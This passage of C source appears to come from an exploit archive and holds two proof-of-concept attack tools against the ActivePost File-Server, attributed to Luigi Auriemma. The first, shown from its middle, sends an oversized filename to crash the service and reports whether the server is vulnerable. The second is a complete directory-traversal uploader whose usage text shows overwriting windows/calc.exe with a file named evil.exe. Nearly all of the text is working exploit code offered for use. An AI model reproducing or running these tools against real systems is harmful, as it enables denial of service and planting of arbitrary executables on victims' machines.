        "e-mail: aluigi@autistici.org\n"
        "web:    http://aluigi.altervista.org\n"
        "\n", stdout);

    if(argc < 2) {
        printf("\nUsage: %s <server> [port(%d)]\n"
            "\n", argv[0], PORT);
        exit(1);
    }

    if(argc > 2) port = atoi(argv[2]);

    peer.sin_addr.s_addr = resolv(argv[1]);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    printf("\n- target   %s:%hu\n",
        inet_ntoa(peer.sin_addr), port);

    sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(sd < 0) std_err();

    if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
      < 0) std_err();

    memset(buff, 0x00, BUFFSZ);

    fputs("- send first header\n", stdout);
    *(u_long *)buff = 0x1f5;
    SEND;
    RECV;

    fputs("- send filename (BOOM)\n", stdout);
    *(u_long *)buff = 0x1f6;
    memset(buff + 8, 'a', BUFFSZ - 8);
    SEND;
    RECV;

    memset(buff, 0x00, BUFFSZ);

    fputs("- send file data (none)\n", stdout);
    *(u_long *)buff = 0x1f8;
    SEND;

    fputs("- send final header\n", stdout);
    *(u_long *)buff = 0x1f9;
    SEND;

    if((timeout(sd) < 0) || (recv(sd, buff, BUFFSZ, 0) < 0)) {
        fputs("\nServer IS vulnerable!!!\n\n", stdout);
    } else {
        fputs("\nServer doesn't seem vulnerable\n\n", stdout);
    }

    close(sd);
    return(0);
}

int timeout(int sock) {
    struct  timeval tout;
    fd_set  fd_read;
    int     err;

    tout.tv_sec  = TIMEOUT;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    err = select(sock + 1, &fd_read, NULL, NULL, &tout);
    if(err < 0) std_err();
    if(!err) return(-1);
    return(0);
}

u_long resolv(char *host) {
    struct  hostent *hp;
    u_long  host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolve hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u_long *)(hp->h_addr);
    }
    return(host_ip);
}

#ifndef WIN32
void std_err(void) {
    perror("\nError");
    exit(1);
}
#endif

ActivePost Directory Traversal:
/*

by Luigi Auriemma - http://aluigi.altervista.org/poc/actpup.zip

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netdb.h>
    #include <netinet/in.h>
#endif

#define VER     "0.1"
#define PORT    6004
#define BUFFSZ  4104    /* don't modify */

#define SEND    if(send(sd, buff, BUFFSZ, 0) \
                < 0) std_err();
#define RECV    for(tot = 0; tot < BUFFSZ; tot += len) { \
                    len = recv(sd, buff + tot, BUFFSZ - tot, 0); \
                    if(len < 0) std_err(); \
                    if(!len) break; \
                }

u_long resolv(char *host);
void std_err(void);

int main(int argc, char *argv[]) {
    FILE    *fd;
    struct  sockaddr_in peer;
    int     sd,
            len,
            tot;
    u_short port = PORT;
    u_char  buff[BUFFSZ];

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    setbuf(stdout, NULL);

    fputs("\n"
        "ActivePost File-Server <= 3.1 traversal file uploader "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    http://aluigi.altervista.org\n"
        "\n", stdout);

    if(argc < 4) {
        printf("\nUsage: %s <local_filename> <remote_filename> <server> [port(%d)]\n"
            "\n"
            "local_filename  is the name of one of your local files that you wanna put on\n"
            "                the remote server.\n"
            "remote_filename instead is the name you wanna give to the file and moreover\n"
            "                the traversal pattern (/..) to reach the desired path on which to put it.\n"
            "                Are needed at least 3 patterns to exit from the ActivePost Server folder,\n"
            "                like /../../../filename or /..../filename\n"
            "                However don't worry because the complete real remote path on which your file\n"
            "                is saved is EVER visible in the server reply.\n"
            "\n"
            "Examples:\n"
            "  %s evil.exe /../../../windows/calc.exe localhost\n"
            "  %s evil.exe /..../windows/calc.exe localhost\n"
            "\n"
            "In this case your file evil.exe will overwrite the calc.exe file of the\n"
            "remote host (if ActivePost has been installed in c:\\).\n"
            "\n", argv[0], PORT, argv[0], argv[0]);
        exit(1);
    }

    printf("- open local file \"%s\"\n", argv[1]);
    fd = fopen(argv[1], "rb");
    if(!fd) std_err();

    if(argc > 4) port = atoi(argv[4]);

    peer.sin_addr.s_addr = resolv(argv[3]);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    printf("- target   %s:%hu\n",
        inet_ntoa(peer.sin_addr),
        port);

    sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(sd < 0) std_err();

    if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
      < 0) std_err();

    memset(buff, 0x00, BUFFSZ);

    fputs("- send first header\n", stdout);
    *(u_long *)buff = 0x1f5;
    SEND;
    RECV;

    printf("- send filename (%s)\n", argv[2]);
    *(u_long *)buff = 0x1f6;
    strncpy((char *)buff + 8, argv[2], BUFFSZ - 8);
    SEND;
    RECV;

    printf("- upload file (%s)\n", argv[1]);
    *(u_long *)buff = 0x1f8;
    while((len = fread(buff + 8, 1, BUFFSZ - 8, fd))) {
        *(u_long *)(buff + 4) = len;
        SEND;
    }
    fclose(fd);

    memset(buff, 0x00, BUFFSZ);

    fputs("- send final header\n", stdout);
    *(u_long *)buff = 0x1f9;
    SEND;

    RECV;
    printf("- remote file has been saved exactly here:\n"
        "  %s\n", buff + 8);

    close(sd);
    fputs("- finished\n\n", stdout);
    return(0);
}

u_long resolv(char *host) {
    struct  hostent *hp;
    u_long  host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolve hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u_long *)(hp->h_addr);
    }
    return(host_ip);
}

#ifndef WIN32
void std_err(void) {
    perror("\nError");
    exit(1);
}
#endif

